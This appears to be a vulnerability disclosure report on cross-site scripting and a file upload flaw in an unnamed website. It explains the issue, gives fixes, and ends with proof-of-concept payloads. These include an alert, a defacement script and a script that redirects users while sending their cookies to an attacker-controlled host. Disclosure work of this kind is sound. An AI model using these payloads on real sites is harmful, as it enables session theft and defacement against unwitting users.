XSS Vulnerability Report Link to heading

What is XSS? Link to heading

Cross-Site Scripting (XSS) is a vulnerability where malicious scripts are injected into a trusted website. This type of vulnerability can occur wherever a web application accepts input from the user without validating / sanitising it. The scripts that can be entered are run by the user’s web browser as they are received from a trusted source. These scripts have the same level of access as the website, meaning full access to the browser cookies, session tokens, or other sensitive data, but they could also affect other sections of the website like the HTML code.

How was it discovered? Link to heading

REDACTED until the vulnerability is fixed or until 6 months has passed

Effects of XSS Link to heading

  • Scripts being run on users browsers
  • Users cookies, session tokens, and other sensitive data being stolen
  • The website could be defaced
  • Users being redirected off site
  • User data being accessed from non-trusted users

Immediate Recommendations Link to heading

Our immediate recommendations are to sanitise user input from all sources, no matter if they are logged in. This would fix the problem of the script being saved to the server and being served to users. This would mean that XSS is no longer viable from the textbox after saving, but it doesn’t fix the problem of it occurring when switching from the HTML view. This could be fixed by deleting the script tags from the HTML in the text box, like what happens with a header tag. The fix for the File upload vulnerability is to check if the uploaded file is an image and then and only then it is passed further down the checks for image size, etc. This should also mean that the file is not attempted to be displayed after uploading. We would also recommend that you give us permission to do a full penetration test on the website, so we can discover more vulnerabilities that might be on the website.

Proof of concept Link to heading 

<!-- Create a Pop up with the domain that it is being executed on -->
<script>alert(document.domain)</script> 

<!-- Redirects users to an attacker owned site and passes the users cookies along. -->
<script type="text/javascript">
document.location="http://192.168.0.48:5000/?c="+document.cookie;"
</script> 

<!-- Replaces the whole website with the word HACKED -->
<script>
const element = document.getElementById("app");
element.innerHTML = "HACKED";
</script>

GitHub issue about XSS Website explaining XSS